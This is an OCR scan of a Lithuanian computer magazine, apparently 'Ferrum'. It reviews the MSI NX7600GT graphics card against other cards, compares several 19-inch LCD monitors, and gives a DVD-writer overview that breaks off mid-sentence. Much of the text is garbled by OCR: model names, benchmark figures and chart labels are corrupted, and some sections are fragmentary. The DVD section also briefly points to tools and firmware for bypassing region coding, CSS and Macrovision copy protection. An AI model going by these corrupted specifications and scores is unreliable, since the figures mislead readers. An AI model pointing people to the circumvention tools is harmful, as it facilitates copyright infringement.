— laikykitės už kedės — 1400 
MHz! Iki šiol vidutinės klasės 
produktai negalėjo pasigirti tokiu 
aukštu įtaisytos vaizdo atminties 
nominalių dažniu. Ką gi, užmojis 
didelis, bet ar tai prasminga? 
Testai parodys. 


Užturbinimas 


Šį kartą mes greičiausiai nu- 
vilsime užturbinimo mėgėjus, 
kadangi užturbinimo nebus. 
Silpnokas aušintuvas vargu ar 
leis mums pasiekti įspūdingus 
GPU įgreitinimo rezultatus, 0 
bet kokio aušinimo stoka at- 
minties lustuose sulaiko nuo 
nepagrįstos rizikos. Be to, ko- 
rta MSI NX7600GT yra tiksli 
referentinės NVIDIA kortos ko- 


pija, todėl po kurio laiko mes galime sulaukti didesnės aušinimo 
sistemų įvairovės 7600GT klasėje. O tiems, kas yra pasirengęs pa- 
sitenkinti nedideliu, tačiau stabiliu prieaugiu, kompanija MSI siūlo 
pasinaudoti firmine technologija D.O.T., leidžiančia autometiškai 
keisti darbinius dažnius nuo 2-jų iki 10-ties procentų. 


Testinių platformų konfigūracija 


Magistralė: PCI-E 

CPU: „AMD Athlon64 4000+“ 

Sisteminė plokštė: „A8N-SLI Deluxe“ 

Atmintis: „Corsair XMS Xpert PC3200“ 2x512 Mb 
OS: WinXP + SP2 + DirectX 9.0c 

PSU: Hiper 525W 


Testavimams buvo naudojamos „NVIDIA 84.21 WHOL“ ir „ATI 
CATALYST 6.3“ versijų tvarkyklės. 


Testavimų rezultatai 


76006GT rezultatai pažymėti ryškiai žalia spalva, X1800GT0O - ryškiai 
raudona, kitų vaizdo kortų NVIDIA lustų pagrindu rezultatai yra 
tamsiai žalios spalvos. Kabutėse nurodyti nominalus dažniai. 
Pradedame tradiciškai nuo sintetinių testų. 


AOMauk 2005 Pro ver 120 - 1024x768 


NANeGTO (500 1000) 
T0GT (560140) 


680065 (425100) 


40961 (509100) 


Turbūt niekas nenustebo, 
kai pamatė X1800GT0 
pranašumą „3DMark'05“ 
teste. Ne paslaptis, kad šis 
testas yra labai palankus 
ATI vaizdo kortoms. Ir ši 
karta tradicija nepažeista. 

i gb - „GeForce 68006GS“ kiek 
atsilieka nuo 7600GT, nepaisant dvigubai siauresnės atminties 
magistralės — pasireiškia žymiai didesni pastarosios dažniai. O jei 
kalbėsime apie 660061, tai 7600GT lenkia ją beveik dvigubai! 
„3DMark'03“ vaizdo korta 7600GT išsiveržia į priekį, tačiau 
pranašumas prieš X1800GT0 neleidžia kalbėti apie sutriuškinimą. 
Tačiau neverta pamiršti, kad 7600GT atminties magistralė dvigubai 
siauresnė. Prisipažinsime, kad prieš testavimą nesitikėjome, jog 
korta su 128 bitų atminties magistrale gali lygiosiomis rungtyniauti 
su aukštesnės klasės sprendimu. 


Kadangi 7600GT pretenduoja į vidutinio segmento viršūnę, 
nusprendėme testavimą atlikti gan sudėtinguose režimuose, su 
įjungtu antiliasingu ir anizotropine filtracija. 


Makt.kte2 d canals. 09 3dnews02 4AA 16AF 
-1024x768 


740067 (560 1400) 


680065 (425109) 


660061 (500100) 


a 0 No B 


7600GT ir X1800GTO žengia šalia, tačiau šiek tiek į priekį vis delto 
išsiveržia 7600GT. Bendras FPS, viršijantis 100 kadrų per sekundę 
atžymą abiems šio testavimo lyderiams, leidžia tikėtis, kad ir esant 
aukštesnei skiriamajai gebai mes galėsime išvysti didelį greitį kartu 
su maksimalia vaizdo kokybe. Be to, diagramoje aiškiai matosi 
dvigubas 76006GT pranašumas prieš 6600GT. 


1 Padidinus skiriamąją geba 
| skirtumas tarp 760067 
ir X1800GT0 sumažėja 
praktiškai iki nulio. 
Žemutinėje diagramos pusėje 
be pakeitimų. 6600GT kaip 
„a 2 ir ankščiau atsilieka nuo 
—— įpėdinio dvigubai. 


Malt.ife2 d4 canale 09 3dnews02 LAA 16AF 


1600x1200 


ĮKt8weGTO (509100) 


750061 (561409) 


134065 |425/1000) 


669067 (504100) 


Toliau didinant skiriamają gebą i priekį išsiveržia X1800GT0. 
Greičiausiai pasireiškia atminties magistralės pločio pranašumas. 
Nepaisant to, 7600GT pademonstruoja visai geimerišką FPS, ir, 
atkreipkite dėmesį - esant maksimaliems kokybės nustetymams! 
Kas galėtų pagalvoti... 


Išvada 


Kadangi MSI NX7600GT yra referentinės 7600GT kortos kopija, 
galima tikėtis, kad šios mūsų išvados bus teisingos daugeliui kortų 
76006GT pagrindu. Turbūt jau spėjote pastebėti, kad skiriamasis 
76006GT bruožas yra „paprastumas“. Tipiška 7600GT vaizdo ko- 
rta yra supaprastinto PCB dizaino, neturi vaizdo užgrobimo lusto, 
GPU branduolys labai mažas. Visa tai leidžia spėti, kad šių kortų 
savikaina nėra didėlė, ir prognozuoti būsimą jų kainų kritimą. 
O įvertinus pademonstruotus puikus rezultatus galima drąsiai 
teigti, kad 7600GT dėl savo kainos ir našumo santykio taps tikru 
pardavimų hitu. 
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FERRUM 
L | 


Daugiau colių! / LCD19 

Intro 

KURIS IŠ MŪSŲ NEMĖGSTĄ IŠSIDRĖBĘS PRIEŠAIS DIDELĮ EKRANĄ 
PAŽIŪRĖTI KINO ARBA PAŽAISTI ŽAIDIMŲ? ANKSČIAU TAI BUVO 
ĮMANOMA TIK ĮSIGIJUS BRANGIAI KAINUOJANČIĄ ĮRANGĄ. TAČIAU 
LAIKAI KEIČIASI, IR JAU DABAR PRAKTIŠKAI KIEKVIENAS VARTOTO- 
JAS GALI ĮSIGYTI PUIKŲ DIDELĖS ĮSTRIŽAINĖS SKYSTŲ KRISTALŲ 
MONITORIŲ. ŠIAME TESTE MES APTARSIME DALĮ TOKIŲ ĮRENGINIŲ, 
KURIE SKIRIASI TIEK SAVO FUNKCIJOMIS, TIEK IR PASKIRTIMI. 


"1 


M 
AE 
k J sone 


[Testavimo metodika] 
Mes pradėjome nuo vieno pagrindinių ėlinimo) 
TFTtest į ekraną buvo amas JL f adratėlis. Jeigu veli 


Spalvų perteikimas buvo t 
alų soką ir 
imu sudaroma diagrama, pagal kurią galim: 
būti ipsnių kampu pakrypusi tiesė 
ngumą, mes iš pradžių šiuos parame 
minimumo. Kuo didesnis gautas diar 
švytėjimą. Mes | vis V me juodą 


[Patarimas] 
ai kurių monitorių matr taip vadinami sugadinti pikseliai. Tai 


okio aškai, kurie e Kai kurios firmo: 


emontuoja Ir nekeičia garantir rimą net jeigu juosė 


tinai | lai 2 Tiesa, daugelis žymių kompanijų šiandien jau garantuc 


Ilšvadosi 
esto re daugelis aptartų Įrenginių 
inius poreikius. Nop: 
filmų žiūrėjimui, k a didelė 
privalumų. D. 
kokybę gauna 


sodrumą Ir nepriekaištingą vaizdą atitenka C 


Degečo. 
Ara 


cpysNadI 


CTX S966A 

Skiriamoji geba: 1280x1024 
Įstrižainė, coliais: 19 
Ryškumas, kd/om * 2: 250 
Kontrastingumas: 450:1 
Maricos vėlinimas, ms: 12 
Apžvalgos kampai (horizontalus vertikalus, 
laipsniais): 140/130 
Garsiakalbiai: 2x1W 

Sąsajos: D-SUB 

abaritai, mm: 415x408x201 


Svoris, ka; 5,9 


Tai yra apipjaustytas savo vyresniojo brolio varian- 
ta apipjaustytas Uk ergonomikos ir dizaino 

» vaizdo kokybe Išliko nepaliesta. Matricos 
vėlinimas vidutiniškas: už judančio balto kvadratėlio 
pastebimas šlertas, tačiau Vis dėlto Jis nėra didolis. 
Ryškumo ir kontrastingumo kuo puikiausiai pakanka 
bet kokiai veiklai. Kolorimetiniai grafikai lygūs, 
tačiau diapazono viduryje Jie pastebimai išsiskiria. 
Šis monitonus yra vienintelis apžvalgoje. pas kurį 
dirbant su analoginių įėjimu (D-SUB) blogai veikė 
automatinis vaizdo sukontigūravimas: vaizdas pa- 
sislinkdavo maždaug centimetrą į kairę Už ekrano 
krašto, 0 Šriftai pasidarydavo išplaukę. Visa tai 
galima sutvarkyti rankiniu būdu, tačiau tam reikia 
laiko. Meniu 


nepatogiai organizuotas, O pereinant tarp Opcijų 


Herai atvalzduotas, tačiau šiek Uek 


jaučiamas tam tikras stabdymas. Be to, ganėtinai 


sunkiai spaudosi vaidymo mygtukai. Mūsų nuosta: 


bai, šiame monitoriuje yra tik analoginė D-SUB 


sąsaja, kas nebūdinga tokios klasės įrenginiams. 
It Ko daugiau nėra nė viename šioje algoje 
sptariamų konkurentų, 0 vienu galu į korpusą 
įmontuotas šlėifas apsunkina monitoriaus įdiegimą. 
Monitoriųje yra įmontuoti garsiakalbiai, tačiau jie. 
nukreipti į apačią, kas šiek ek pablogina garso 
kokybę. Nepaisant 10, žiūrint filmus jų visiškai pa. 
Kaks (jelju Uk per daug smarkiai neatsuksi garso, dėl 
ko jie gali pradėti džergži). Deja, garsas valdomas 
tik per monitoriaus meniu — atskirų tam skirtų 
Mygtukų nėta. Kaip kdomią ypatybę būtų galima 
paminėti pernešimui skirtą rankena. 


Samsung SyncMaster 970p 
Skiriamoji gebi 
Įstrižainė, coliais: 19 
Ryškumas, kdlom 2: 250 
Kontrastingumas: 1000:1 
Matricos vėlinimas, ms: 6 
Apžvalgos kampai (horizontalus /vertikalus 
laipsniais): 178/178 
Garsiakalbiai: nėra 
Sąsajos: D-SUB, DVI-D 
Ibaritai, mm: 423x42 


Ko gero, tai pats stilingiausias įrenginys mūsų 
apžvalgoje: vis kampai suapvalinti, korpusas pagamin. 
tas. blizgančio baito ir sidabrinio plastiko, pailgintą 
įjungimo mygtuką apšviečia mėlyna lemputė. Iš 
karto paminėsime nepaprasta įrengnio „lankstumą 
pagrindą ir ekraną sujungiants kronštenas turi tris 
šamyrus, 0 konkurentai gali pasigirti daugiausia 
dviem. Be viso Kito. visi kabeliai Jungjami ne prie 
pagrindo, O prie specialaus modulio, kuris prie 
korpuso jungiamas per nedidelį kabelį — toks kom 
ponavimas neleiciia persisukti kietam DVI-D šleitui 
Monitorių galma pasukti 90 („poriretinis“ režimas) 
ir net 180 lapsnių. Visa lai leidžia šį monitorių be 
patngių problemų statyti praktiškai bet kokloje Vi 
etoje. Kalbant apie vaizdo kokybę, situacija dvejopa. 
Iš Vienos pusės yra labai geras spalvų perteikimas: 
grafikai lygtis, be šuoliukų, tiesa, viduryje matosi 
išsišakojmas. Monitoriaus apžvalgos kampai, ko gero, 
ra didžiausi iš visų aptariamų Įrenginių r čia praktiškai 
nera staigaus vaizdo kokybės suprastėjimo ekraną 
pakvvipus žemyn. Ryškumas visame ekrano paviršiuje 
tolygaus, kas taip pat negali necžiugynti. Iš kitos puses 
didokas pikselio vėlinimo laikas: paskui judančius 
objektus Ieka akivaizdus šleifas, kuris be viso kito savo 
spaką kia raudoną. Taiypatingai gerai pastebima 
atliekant testą Ir vs Kitut, kur yra didelis kontrastė 
tarp judančio objekto Ir fono (fimai, 30 šaudykk 
Taip pal liūdina meniu nebuvimas: pyeičiausiai jis buvo 
paaukotas varcian stiliaus —— Monitoriaus priekyje SU. 
montuoti mygtukai gerokai sugadinių bendrą vaizdą. 
ačiau komplekte pateikiama programa, kun turi visas 
meniu funkcijas. Necžiugina ir tai, kak! nėra atskiro 
analogynvo įėjimo: D- SUB prie DV galima prijungti k 


per specialų kamplekte pateikiamą kabelį 


ViewSonic VA1912w 
Skiriamoji geba: 14404900 
Įstižainė, colis: 19 Wide 

Ryškumas, kaem * 2: 30C 

Kontrastingumas: 500:1 

Matricos vėlinimas, ms: 8 

Apžvalgos kampai (horizontalus/vert 
laipsniais): 130/150 

Garsiakalbiai: nėra 

Sąsajos: D-SUB, DVI-D 

Gabaritai. mm: 45:5391x19 

Svoris, kg: 4,5 


Eilinis plačiaekranis — šį kartą iš gerai žinomos: 
firmos „ViewSonk“. Jame pastebimos tam tikios: 
matricos vėlinimo anomalijos — juodame ehrai 
judantis baltas kvadratėlis kairiame apatiniame. 
kampe palieka akivaizdų pėdsaką, ko nesimato. 
Visame ikusiame paviršiųe. Ši savybė labai gerai 
matoma žiūrint filmus: judantys objektai šiame: 
kampe kur kas smarkiau Išplaukia. Maždaug tokia. 
pati situacija susiklostė Ir su tyškumu, Tiesa, čia. 
netolygumas pastebimas visoje apatinėje dalje 
(grečiausiai tai konkretaus egzemploriaus ypatybė, 
tačiau tai rodo, kad! perkant betkokį monitorių, verta 
iš pardlavėjo reikalauti prijungti monitorių iru juo atikti 
papastą gra testą). Monitoriaus spakų perteikimas: 
Uesiag puikus: linios praktiškai sutampa ir jose nera 
Jokių bent kiek labiau pastebimų nuokvypių (nagai Šį 
rodiį Viewsonic VA1912w sutriuškino visus kitus 
testuoti įrenginius). Monitoriui pastebimai trūksta 
ryškumo ir kontrastingumo — abu šie parametrai 
pasiekia nedideles maksimalias reikšmes, O L 
reiškia, kad! bus nelabai patogu žaisti tamsius 
aidimus. VA1912w gali pasigirti gana neblogais 
apžvalgos kampais: judant žemyn vaizdas pradexia: 
byškėti ne taip greitai, kaip kai kurių konkurentų. 
Valdymo elementai įdiegti kokybiškai: meniu 
gerai viaualizuotas, navigacija patogi. Ryškumą. 
ir kontrastingumą galima derinti su atskirais. 
mygtukais, 0 garso reguliavimui tokia funkcija. 
nenumatyta, nors Šį parametrą teikia keisti kur kas. 
dažniau. Liūdna ir tai, kad monitoriuje nėra Mini 
Jack išėjimo, todėl jeigu tu norėsi prie jo prijungti 

arba garsiakalbius, Wks pirkti šakotuvą.. 

ąsąjos pasleptos nedidelėje įdauboje, 
Kurią galima uždaryti speciali dangteliu, tačiau 
jamo per mažos šleitams skirtos angos, todėl dėl 
Neaksargaus judesio Jis gali nulėkti 


ASUS PW191 

Skinamoji geba: 14405900 
Įstrižainė, colias: 19 Wide 
Ryškumas, kd/cm “ 2: 330. 
Kontrastingumas: 600:1 
Matricos velinimas. ms: 8 
Apžvalgos kampai (horizontalus/vertikalus, laipsr 
150/130 

Garsiakalbiai: 242W 

Sąsajos: D-SUB, DVI-D 

Gabaritai, mm: 5 04280 


Svoris, Kg: 10,8 


Šis monitorius specialiai skirtas kino mėgėjams. 
Pikselių atsako laikas nedidelis, kas yra Išties svarbu, 
kadangi tuomet bus korektiškai atvaizduojami Judantys 
objektai. Maksimalios korirastngjumo ir ryškumoreikšmės. 
aukštos, jos gali būti keičiamos plačiame dkapazone, kas 
ypač gerai dirbant patalpose su daug Šviestuvų. Aptikome 


mų su matricos švytėjmu: į visą ekraną 
išvedus juodą spalvą, apatinėje ir vršutinėje jo dalyje buvo 
matom boluojantys raštai. Su apžvalgos kampais nekik 
Įokių problemų — vaizdas pasidarydavo blyškus Uk smar 
kiai pakreipus į apačią. Matricos paviršius blizgantis 
todėl įrenginį reikės įkurdinti ten, Kur | jį Kristų tik 
tspindeta ir išsklaidyta šviesa, nes priešingu atveju 
tau greitai pavargs akys. Šviesą smarkiai atspindi Ir 
pais Korpusas, ant kuno gerai pastebimos dulkės 
Ekrano šonuose Įrengti pakankamai gerą garso kokybę 
suteikiantys garsiakalbiai — jų pakaks filmams Ir 
žaidimams, tačiau muzikai gali Ir pritrūkti. ASUS 
PM191 parametrai valdomi su sensoriniais mygtukais, 
Kue įkurdinti dešiniame apatiniame priekinio skydelid 
kampe, efektyviai apšviečiami oranžiniais šviesos 

Igacija po meniu patogi, opcij 


an tarp jų jaučiami tam tikri Už 


įmontuotos D-SUB ir DVI-D sąsajos, kas 


4 standartiška tokios Klasės įrenginiams 
atžvilgiu gali judėti aukštyn: žemyn 

aktiškai vil, tačiau jei | 

Markt patrauksi į priekį ir palenksi, jo padėtis tampa: 
tab ir monitonus ali nukristi. Monitorių galime 
pasukt 90 laipsnių kampu į „portretinį“ režimą (tuomet 
daug patogiau dirbti su pd! tekstais Ir vertikaliomis 


BENG FP93GX 
Skiriamoji geba: 1280x1024 

Įstrižainė, colias: 19 

Ryškumas, kd/em“ 2: 270 

Kontrastingumas: 700:1 

Matricos velinimas, ms: 2 

Apžvalgos kampai (horizontalus/vertikalus, laip- 
Sniais): 160/160 

Garsiakalbiai: nėra 

Sąsajos: D-SUB, DVI-D 

Gabaritai, mm: 410x404x168 

Svoris, kg: 6,5 


Priešingai nei prieš tai aptartame įrengin 
pastarojo ekrano skiriamoji geba yra 
1280x1024). BENO FP93GX monitoriuje pan: 
audota GTG technologija, kuri pikselių vėlinimą 
Ielėžia sumažinti net Iki 2 miisekundžių (be 
meniu numatytas GTG įjungimo/šjungimo punktas)! 
Vizualinis testas parodė Iš tėsų neblogus reztulta. 
tus: judantis kvadratėlis iš viso nepalikdavo joko 
leo. Ryškumą galima keisti plačiame diapazone, 
tačiau įeig jį padidintume iki maksimumo, spalvos 
pradeda „išdeginėti“ (pavyzdžiui, žalia virsta salotine, 
mėlyna — žydrair.t). Spalvų perteikimas su stand. 
artiniais nustatymais pasirodė esąs vicutini 
kolorimetriniai grafikai nelygūs, pradžioje matomi 
Tyškūs perėjimai, O viduryje — išsišakojimai. | visą) 
ekraną išvedus juodą spalvą, jo dešinėje ir kairėje 
matomi boluojantys raštai, kas byloja apie netolygų 
matncos švytėjimą. Pastarieji ypatingai pastebi 
tamsiuose“ žaidimuose ir fimuose. Ne patys geri 
ausi Ir apžvalgos Kampai; pasukus monitorių nuo 
centrinės ašies | dešinę ar kairę, vazdas pradedi 
blykšti, o monitorių pasukus žemyn spalvos atrodo 
kaip negatyve (jeigu su kompanija žiūrėsi filmą, 
tai sėdintiesiems ne prieš pat ekraną vaizdas bus 
tikrai ne pats geriausias). Meniu padarytas £ 
navigacija patogį. Ryškumas ir kontrastingumas gali 
būt valdomi su atskrais mygtukais. Be standartinių 
nustatymų monitorius turi i-koy funkciją, kuri leidžia 
kokybiškiau sukantigūruoti vaizdą. Ši funkcija 
veikia tik tuomet, kai BENO FP93GX prijungtas 
per analoginį įėjimą (darbui per DVI nereikia nieko 
Specialiai konfigūruoti — viskas Ir taip gerai ma. 
tosi), Ekraną galima sukinėti Uk vertikalioje ašyje, 
tačiau dideliais kampais, kas labai patogiu įrenginį 
naudojant demonstracijose. 


CTX P972 
Skiriamoji geba: 1280x1024 

Įstrižainė, coliais: 19 

Ryškumas, Kd/cm 

Kontrastingumas: 

Malricos vėlinimas, ms: 16 

Apžvalgos kampai (horizontalus vertikalus, 
laipsniais): 14013! 

Garsiakalbiai: nera 

Sąsajos: D-SUB, DVI-D 

Gabaritai, mm: 4284108x380 


Svoris, kg: 7.1 


Vienas geriausių apžvalgoje aptaramų įrenginių 
matricos vėlinimas nepastebimas net Ir su 
pačiais greičiausiais objektais, koloimetriniai 
grafikai lygos, nėra jokių didesnių nuokrypių 
Inijų išsišakojmas menkas, kas byloja apie 
gerą atspalvių alkūrimą. Šiek tiek nuvilia 
ryškumas — maksimali jo reikšmė vis dėlto 
nėra didelė, todėl dirbti šviesiose patalpose bus 
Kek nepatogu. O matricos švytėjimas tolygus 

nedidelį defektai matomi Uk po detalios 
apžiūros. Apžvalgos kampai dideli, tačiau 
pakreipus žemyn vaizdas vis dėto bykšta, ką, 
beje, buvo galima pastebėti praktiškai su visais 
teste dalyvavusias įrenginiais. Meniu gana 
patogus I gerai vizualizuotas, tačiau navigacija 
Kiek nepatogi — perėjimui tarp opaijų reikia 
per daug mygtukų paspaudimų. CTX PO72 
stlingas ir tuo pačiu ergonomiškas: korpuso 
paviršiaus sidabrinis, pilki tik ekrano kraštai 
Pagnndas pagamintas iš metalo, kas įrenginiui 
suteikia ypatingą statusą. Jungmoišjungmo 
myktuką apšviečia melynas šviesos diodas 
kuris puikiai atrodo, tačiau gali biaškyti dirbant 
Matricą galima sukinėti praktiškai visomis 
plokštumoris: standartiškai dešinėn/kairėn 
It viršurVapačion, pripažįstamas „portretinis“ 
režimas, Svarbiausia yra tai, jog jį galima pa 
el arba nuleisti stalo atžvilgiu, todėl visiškai 
nesvarbu, ar tavo kėdė aukšta, ar ne — bet 
kokiuatveju ekrano padėtį bus galima pritaikyti 
saviems poreikiams. Monitoriuje sumontuoti 

nyn nukreipti garsiakalbiai, del ko je parodo 
ne pačius geriausius rezultatus — garsas 
gana duslus, Dėja, garsą reguliuoti galima 
tik per meniu, gerą įspūdį taip pat gadina tai 
Jog įrenginyje nėra ausinėms arba išoriniams 
garsiakalbiams skirto lizdo. 


FERRUM 


018 


Įrašyk greitai 

Intro 2 

VISAI NESENIAI TELEFONU ISSAKYTAS 
PRAŠYMAS „MESTELK PORĄ FILMŲ“ 
REIŠKĖ TERLIONĘ SU KELIAIS DISKAIS. 
ATSIRADUS DVD ĮRAŠYMO ĮRENGINIAMS, 
PASIKEITĖ NE TIK VIENAME DISKE 
TELPANČIŲ DUOMENŲ KIEKIS, TAČIAU IR 
DISKO ĮRAŠYMUI SUGAIŠTAMAS LAIKAS. 
TU TURĖSI PATS NUSPRĘSTI, KAIP IŠLEISTI 
SAVO PINIGĖLIUS, O MES TAU PADĖSIME 
IŠSIRINKTI DVD RAŠIKLĮ. 


IMPLANT SOFTWARE 


HACK 


[Ištakos] Siekimas išsaugoti daugiau ir tuo pačiu sugaišti 
mažiau visada persekiojo į IT orientuotą visuomenės dalį. 
Kadaise sėkmingiausias ir patogiausiais informacijos 
nešėjais buvo 3,5“ formato diskeliai, tačiau būtinybė 
saugoti ir perdavinėti vis didesnius informacijos kiekius 
stūmė korporacijas pirmyn. Vėliau atsirado pirmasis 
optinis diskas, sėkmingai pritaikytas įvairiausiems du- 
omenims saugoti. Didelė talpa ir patikimumas buvo ne tik 
tokio duomenų saugojimo privalumai, tačiau ir trūkumai. 
Technologiškai 800 megabaitų riba jau netenkino išrankių 
vartotojų, todėl buvo sukurtas koncemas pažangesnės 
informacijos kaupyklai kurti. Buvo nuspręsta eiti jau turimo 
CD tobulinimo keliu. Kaip ir kompaktinių diskų atveju, DVD 
kūrimas iš pradžių buvo atliekamas dėl kino industrijos 
interesų, juk didesnė talpa leido mažiau suspausti vaizdą 
ir garsą, tuo pačiu patenkinant be galo didelius vartotojų 
poreikius. Vėliau, kaip tai buvo ir su CD, DVD labai sėkmingai 
prigijo ir kompiuterių pasaulyje kaip puiki ir talpi informacijos 
kaupykla. Taip DVD pradėjo savo kelionę į mases. 


SCENA 


UNIXOID 


[Kas yra DVD?] Jeigu pažiūrėtum į veidrodinę (arba ki- 
taip tariant darbinę) DVD disko pusę, galėtum jį lengvai 
supainioti su CD. Jų gamybos technologija panaši. Abu jie 
turi atspindintį sluoksni, kuris nuo lazerio poveikio keičia 
savo fizines savybes. Tačiau taip tik atrodo. Iš tiesų DVD 
už savo pirmtaką dvigubai plonesnis, todėl tapo įmanoma 
kurti dvipusius diskus, t.y. tiesiog suklijuoti du DVD diskus 
į vieną. Pritaikius naujus atspindinčius sluoksnius, buvo 
surastas būdas, kaip padidinti kaupiklio talpą, sukuriant 
papildomą apriboto skaidrumo sluoksnį. Ta prasme buvo 
sukurtas lyg ir sumuštinis, kur pirmas eina pusiau skai- 
drus sluoksnis, o antras — neskaidrus. Pirmąjį sluoksnį 
nuskaitęs lazeris pakeičia fokusavimą ir nuskaito duomenis 
iš antrojo. Taip mes gauname keturis diskų tipus: 


CODING 


1. DVD-5 — vieno sluoksnio vienpusis (4.7 Gb) 
2. DVD-9 — dvisluoksnis dvipusis (8.5 Gb) 


UNITS 


Š 


3. DVD-10 
4. DVD-18 


- vieno sluoksnio dvipusis (9.5 Gb) 
dvisluoksnis dvipusis (17 Gb) 


Tačiau pagrindinis skirtumas yra įrašymo tankumas, kuris išaugo 
keletą kartų. Panaudojus lazerį sų trumpesniu bangos ilgiu, pavyko 
sutrumpinti atstumą tarp spiralės takelių ir tarp pit'ų (griovelių). 
Iš išvardintų tipų labiausiai paplito trys pirmieji, todėl juos galima 
nesunkiai rasti ant parduotuvių prekystalių. 


[Apsaugos metodai] Kadangi DVD formato kūrime dalyvavo kino 
kompanijos, jos buvo suinteresuotos efektyvia savo produkcijos ap- 
sauga. Tu tikriausiai esi susidūręs su tokiu reiškiniu, kaip kino filmų 
išleidimas skirtingu metu skirtingose šalyse. Norint apsisaugoti nuo 
pasaulyje platinamų piratiniu kopijų, buvo nuspręsta visą planetą 
padalinti į zonas. Kiekvienas diskas koduojamas priklausomai nuo 
zonos, į kurią tas diskas yra vežamas, o buitiniai DVD grotuvai turi 


rakta, kuris dekoduoja filmą. Taip būdamas Lietuvoje ir nusipirkęs 
oficialiai pagamintą grotuvą, tu negalėsi peržiūrėti iš JAV parvežto 
filmo. Iš viso yra 8 zonos: 

1. Kanada ir JAV; 

2. Japonija, Europa, Pietų Afrika, Artimieji Rytai 

3. Pietryčių Azija, Rytų Azija; 

4. Australija, Naujoji Zelandija, Ramiojo Vandenyno salos, Karibų 
salos, Pietų ir Centrinė Amerika; 

5. Buvusios TSRS teritorija, Indijos pusiasalis, pagrindinė Afrikos 
dalis; 

6. Kinija; 

T. Užrezervuota zona; 

8. Eksteritorinė zona: lėktuvai, laineriai, garlaiviai, 
Gaminami ir multizoniniai irenginiai, leidžiantys nuskaityti bet kurios 
zonos diskus. Gana greitai tokį dalyką buvo nuspręsta nutraukti, 
tačiau už Informacijos prieinamumą kovojančių Mėgėjų dėka 


pasirodė specialios programos ir įrenginiams skirti mikroprogramų 
pataisymai. Dažniausiai kompiuteriams skirti DVD rašymo įrenginiai 
zona leidžia keisti iki 5 kartų ir po to paskutinį kartą užsiblokuoja. 
Vis dėlto ir čia buvo sukurtos įrenginių mikroprogramos, kurios 
užtikrina galimybę dirbti visose zonose. Adresu www.rpc1.org kartais 
galima rasti ir savo įrenginiui tinkamą mikroprogramą 

Kiti apsaugos metodai ne mažiau efektyvūs, tačiau jie veikia šiek 
tiek kitaip. Pirmasis — Content Scrambling System — DVD turinį 
šifruoja taip, kad jo kopijos nebūtų galima peržiūrėti kietajame 
diske. Tačiau ir šiuo atveju hakeriai surado, kaip įveikti apsaugą, 
pavyzdžiui, su programa DVD Region+CSS Free. 

Antroji technologija skirta kovai su senais piratais. Ji veikia štai taip 
perduodant analoginį signala į televizorių, viskas labai gerai matosi dėl 
jo inertiškumo. O įrašinėjant tokį signalą į vaizdo magnetofoną susidaro 
nemaloniai atrodančios vertikalios juostelės, prarandamos spalvos, 
asinchronizuojasi kadrai. Ši sistema vadinasi Analogue Protection Sys- 
tem arba APS. Hakeriai šią apsaugą apeina su mikrovaldiklio pagrindu 
veikiančiu savadarbiu prietaisu (http://macrovisionO.tripod.com/) arba 
už —80 dolerių per intenetą nusiperka jau paruoštą įrenginį. 


[Testavimo metodika] Teste buvo įdarbinta į Ahead Nero paketo sudėtį 
įeinanti programa CD-DVD Speed. Skaitymo Ir rašymo greiči 
imui buvo pasirinkti 16x DVD+R diskai. Toki testą su savo įrenginiu gali 
atlikti Ir tu. Iš pradžių buvo įrašomas diskas su duomenimis, darbo metu 
buvo fiksuojamas vidutinis ir maksimalus rašymo greitis. Grafikuose 
žalia spalva pavaizduotas rašymo greitis, o geltona — įrenginio ašies 
sukimosi greitis. Dirbant skirtingais įrašymo režimais, įrenginys gali tiek 
didinti rašymo greitį (didindamas apsisukimų skaičių), tiek ir stabilzuoti 
sukimosi greitį. Paprastai skaitymo greitis didėja artėjant prie išorinio 
disko krašto, kadangi galvutė per tą pati laiką praeina didesnį atstumą. 
Skaitymo greičiui užfiksuoti buvo naudojama ta pati programa. Ji puikiai 
pademonstruoja, ko laukti iš įrenginio kopijavimo metu. 


[Išvados] Dabartinėje realybėje brangiausiais yra laikas. Tu, kaip 
rimtas ir užsiėmęs žmogus, žinai, kiek Jis kainuoja, todėl prarasti 
pinigus dėl ramaus pasėdėjimo prie kompiuterio, laukiant, kol pa 
sibaigs įrašymas, būtų neprotinga. Dėl palankios kainos ir didelio 
greičio „Geriausiu pirkiniu“ mes tituluojame Samsung Writemaster 
SH-W162C. Už technologiškumą ir lojalumą vartotojui „Redakcijos 
pasirinkimo“ prizą gauna HP DVD8491. 


[Samsung Writemaster SH-W162C] 
Palaikomi DVD formatai: 4+/-R, +/-RW 

DVD įrašymo greitis: +/-R (16x), +/-RW(8x), +/-R DL(4x) 
Testinis DVD+R 16x įrašymo greitis: 5,56 

Mums į rankas pakliuvo stilingas juodas Samsung įrenginys. Ji pri- 
jungti ilgai netruko, o sistema automatiškai nustatė modelį ir idiegė 
reikiamas tvarkykles. Nepaisant neaukštos kainos, įrenginys puikiai 
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pasirodė įrašinėjant testinį diską, kuriam buvo sugaišta mažiau nei 
šešios minutės — puikus rezultatas. Grafike matosi dantyta diagrama, 
kuri parodo įrašymo greičio šuoliukus. Priartėjęs prie disko krašto, 
įrenginys staigiai sumažino greitų, kas gali lemti skaitymo klaidas 
arba užlaikymus kopijavimo metu, Greičio testas parodė, kad tą patį 
diską Samsung Writemaster SHW162C nuskaitė per šešias su puse 
minutės. Maksimalus skaitymo greitis pasiekė 12.37x ribą, tačiau net 
ir tuomet įrenginys triukšmavo nesmarkiai ir negąsdino vibracijomis. 
DVD-RAM palaikymo nebuvimą kompensuoja palanki kaina. 


[HP DVD8491] 

Suderinami DVD formatai: +/-R, +/-RW, -RAM 

DVD įrašymo greitis: +/-R (16x), +/-RW(8x/6x), +/-R DL(8x/ 
4x), -RAM(5x) 

Testinis DVD+R 16x įrašymo greitis: 5,40 

Naujasis Hewlett Packard DVD rašiklio modelis. Kaip jį 
pakrikštijo pati kompanija — Super Multi DVD Writer. Ir iš tiesų, 
įrenginys leidžia dirbti su visais DVD formatais. Maloniausia 
buvo tai, kad įrenginys tapo absoliučiu rekordininku DVD+R 
įrašymo teste. Greičio rodikliai visais režimais leidžia manyti, 
kad HP DVD849] bus aktualus dar ilgai. Atskirai reikėtų aptarti 
tiesiogiai su DVD įrašymu nesusijusią technologiją LightScribe. 
Jos esmė tame, kad ant papildomą sluoksnį turinčio disko 
galima nupiešti bet kokį atvaizdą, t.y. ant tos pusės, | kurią tu 
žiūri, dėdamas diską į įrenginį, galima nupiešti monochrominį 
vaizdelį. Visas grožis čia tame, kad nereikia spausdintuvo, o 
